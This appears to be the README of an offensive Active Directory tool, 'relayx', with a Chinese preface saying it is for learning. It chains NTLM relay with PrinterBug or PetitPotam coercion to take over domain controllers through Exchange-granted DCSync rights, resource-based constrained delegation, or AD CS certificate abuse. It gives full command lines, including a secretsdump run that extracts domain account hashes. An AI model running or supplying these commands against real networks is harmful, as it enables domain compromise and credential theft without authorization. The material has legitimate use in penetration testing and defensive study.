一切开发旨在学习,请勿用于非法用途
将几个比较好用的relay集成到了一起,提高测试效率。
DCpwn with ntlmrelay
positional arguments:
target [[domain/]username[:password]@]<targetName or address> or LOCAL (if you want to parse local files)
optional arguments:
-h, --help show this help message and exit
-r CALLBACK_IP, --callback-ip CALLBACK_IP
Attacker callback IP
--timeout TIMEOUT timeout in seconds
--debug Enable debug output
-ts Adds timestamp to every logging output
--smb-port [destination port]
Destination port to connect to SMB Server
authentication:
-hashes LMHASH:NTHASH
Hash for account auth (instead of password)
connection:
-dc-ip ip address IP address of the Domain Controller
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it
attack:
-m {rbcd,pki}, --method {rbcd,pki}
Set up attack method, rbcd or pki
-t {printer,efs}, --trigger {printer,efs}
Set up trigger method, printer or petitpotam
--impersonate IMPERSONATE
target username that will be impersonated (thru S4U2Self) for quering the ST. Keep in mind this will only work if the identity provided in this scripts is allowed for delegation to the SPN specified
--add-computer [COMPUTERNAME]
Attempt to add a new computer account
-pipe {efsr,lsarpc,samr,netlogon,lsass}
Named pipe to use (default: lsarpc)
--template TEMPLATE AD CS template. If you are attacking Domain Controller or other windows server machine, default value should be suitable.
-ssl This is useful when AD CS use ssl.
execute:
-share SHARE share where the output will be grabbed from (default ADMIN$)
-shell-type {cmd,powershell}
choose a command processor for the semi-interactive shell
-codec CODEC Sets encoding used (codec) from the target's output (default "GBK").
工具中包含了两种触发机器回连的操作。 printerbug 和 PetitPotam。 触发可通过指定参数来实现,默认使用printerbug
-t printer # 使用 打印机bug 触发
-t efs # 使用 MS-EFSRPC 触发
默认Exchange的服务权限较高,所以工具会利用Exchange的权限将当前用户增加Dcsync权限。
python relayx.py cgdomain.com/sanfeng:'1qaz@WSX'@10.211.55.201 -r 10.211.55.2 -dc-ip 10.211.55.200
目标的方式可以使用impacket的方式来写,@后跟目标即可,-r 是回连IP,也就是我们的攻击IP,-dc-ip 指定要去认证或者请求的DC ip, 后面一样,就不再重复。
攻击之后,当前用户可进行dcsync:
secretsdump.py cgdomain.com/sanfeng:'1qaz@WSX'@10.211.55.200 -just-dc-user cgdomain\\exchange$
使用aclpwn可进行还原(这里需要exchange服务器的机器账号hash):
aclpwn -r aclpwn-xxxxx-xxxxx.restore
攻击普通服务器会自动使用RBCD(基于资源的约束委派)来攻击,所以这里需要域级别>= Server2012R2。
python relayx.py cgdomain.com/sanfeng:'1qaz@WSX'@10.211.55.202 -r 10.211.55.2 -dc-ip 10.211.55.203
攻击成功后,会自动获取一个交互式shell,并会生成一个ccache文件供以后使用,这里默认会模拟administrator
的身份,如果不存在administrator,可通过--impersonate
来指定目标用户。
这里默认会添加一个新的计算机账号,可通过--add-computer 来指定机器名,不指定则为随机名。
这里要求目标环境安装了AD CS
。攻击AD CS 可以通过-m pki
来指定。
python relayx.py cgdomain.com/sanfeng:'1qaz@WSX'@10.211.55.202 -r 10.211.55.2 -dc-ip 10.211.55.200 -m pki
这里会向CS申请一个机器账号的证书,之后通过Rubues进行后续攻击即可。